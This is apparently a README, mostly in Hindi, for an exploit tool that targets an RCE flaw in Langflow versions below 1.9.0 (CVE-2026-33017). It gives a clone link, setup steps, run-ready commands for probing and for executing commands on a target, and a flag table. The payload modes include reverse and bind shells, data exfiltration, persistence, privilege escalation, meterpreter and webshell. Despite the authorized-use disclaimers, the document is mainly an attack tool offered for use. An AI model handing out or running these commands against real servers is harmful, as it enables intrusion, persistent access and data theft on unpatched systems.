
CVE-2026-33017 के लिए Langflow <1.9.0 शोषण उपकरण। इसमें रिवर्स शेल, कमांड निष्पादन, फ़ाइल संचालन, स्थिरता और स्वचालित परीक्षण शामिल हैं। गंभीर RCE भेद्यता के प्रभाव को मान्य करता है। केवल अधिकृत सुरक्षा मूल्यांकन के लिए।
CVE-2026-33017 · लैंगफ्लो रिमोट कोड एक्सिक्यूशन के लिए अधिकृत सुरक्षा परीक्षण
अनुसंधान एवं रेड-टीम टूलिंग उन लैंगफ्लो इंस्टेंस के विरुद्ध CVE-2026-33017 को मान्य करने के लिए, जिनका आकलन करने के लिए आप स्पष्ट रूप से अधिकृत हैं। अनधिकृत उपयोग के लिए नहीं।
यह प्रोजेक्ट केवल निम्नलिखित के लिए है:
कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध है। किसी भी लक्ष्य का परीक्षण करने से पहले लागू कानूनों का पालन करने और लिखित अनुमति प्राप्त करने की पूरी जिम्मेदारी आपकी है। लेखक दुरुपयोग के लिए कोई दायित्व स्वीकार नहीं करते हैं।
CVE-2026-33017 से संभावित रूप से प्रभावित लैंगफ्लो डिप्लॉयमेंट का आकलन करने के लिए Async Python फ्रेमवर्क। यह भेद्यता जांच, पेलोड-मोड चयन, स्वचालित आकलन रन, और एंगेजमेंट दस्तावेज़ीकरण के लिए संरचित रिपोर्टिंग का समर्थन करता है।
| आइटम | विवरण |
|---|---|
| CVE | CVE-2026-33017 |
| लक्ष्य | लैंगफ्लो |
| सुझावित उपाय | लैंगफ्लो ≥ 1.9.0 में अपग्रेड करें |
| भाषा | Python 3.10+ |
| संस्करण | 1.0.0 |
| लेखक | Sudeepa Wanigarathna |
--check-only मोड--auto / बैच-उन्मुख रनhttpx पर निर्मितflow-id और client-idgit clone https://github.com/CerberusMrXi/Langflow-cve-2026-33017-exploit
cd Langflow-cve-2026-33017-exploit
python3 -m venv venv
source venv/bin/activate # Windows: venv\Scripts\activate
pip install -r requirements.txt
python exploit.py \
-u http://127.0.0.1:7860 \
-f <FLOW_ID> \
-c <CLIENT_ID> \
--check-only
python exploit.py \
-u http://127.0.0.1:7860 \
-f <FLOW_ID> \
-c <CLIENT_ID> \
-t command_exec \
--cmd "id"
python exploit.py \
-u http://127.0.0.1:7860 \
-f <FLOW_ID> \
-c <CLIENT_ID> \
-t command_exec \
--cmd "uname -a" \
--report markdown \
--output-file report.md
python exploit.py -u URL -f FLOW_ID -c CLIENT_ID [options]
| फ़्लैग | विवरण |
|---|---|
-u, --url | लक्ष्य बेस URL (जैसे http://127.0.0.1:7860) |
-f, --flow-id | लैंगफ्लो फ्लो ID |
-c, --client-id | क्लाइंट ID कुकी मान |
| फ़्लैग | विवरण |
|---|---|
-t, --payload-type | reverse_shell, bind_shell, command_exec, file_read, file_upload, persistence, priv_esc, data_exfil, meterpreter, webshell, all (डिफ़ॉल्ट: reverse_shell) |
-l, --lhost | लिसनर होस्ट (जहाँ लागू हो, छोड़े जाने पर स्वतः पता लगाया जाता है) |
-p, --lport | लिसनर पोर्ट (shell / meterpreter मोड के लिए आवश्यक) |
--cmd | कमांड स्ट्रिंग (command_exec) |
--file-path | फ़ाइल पठन/अपलोड मोड के लिए पथ |
--file-data | अपलोड सामग्री (file_upload) |
| फ़्लैग | विवरण |
|---|---|
--auto | स्वचालित एक्सप्लॉइटेशन वर्कफ़्लो |
--check-only | केवल भेद्यता जांच |
--batch | बैच मोड |
--report | text | json | html | markdown |
--output-file | रिपोर्ट/आउटपुट को फ़ाइल में लिखें |
-v, --verbose | विस्तृत लॉगिंग |
-q, --quiet | केवल त्रुटियाँ |
.
├── exploit.py # Main CLI & assessment engine
├── requirements.txt # Python dependencies
├── README.md # This file
└── venv/ # Local virtualenv (not for version control)
यदि कोई लक्ष्य CVE-2026-33017 के प्रति संवेदनशील है:
--check-only दोबारा चलाएँ--check-only को प्राथमिकता देंविश्वसनीयता, रिपोर्टिंग, पहचान सटीकता, या डिफेंसिव दस्तावेज़ीकरण में सुधार करने वाले योगदानों का स्वागत है। परिवर्तन का स्पष्ट विवरण और यह कि इसे लैब वातावरण में कैसे मान्य किया गया, के साथ एक issue या pull request खोलें।
केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक अनुसंधान के लिए प्रदान किया गया।
कोई वारंटी प्रदान नहीं की जाती है। अपने जोखिम पर और कानून के अनुपालन में उपयोग करें।
Sudeepa Wanigarathna
अधिकृत सुरक्षा अनुसंधान के लिए · CVE-2026-33017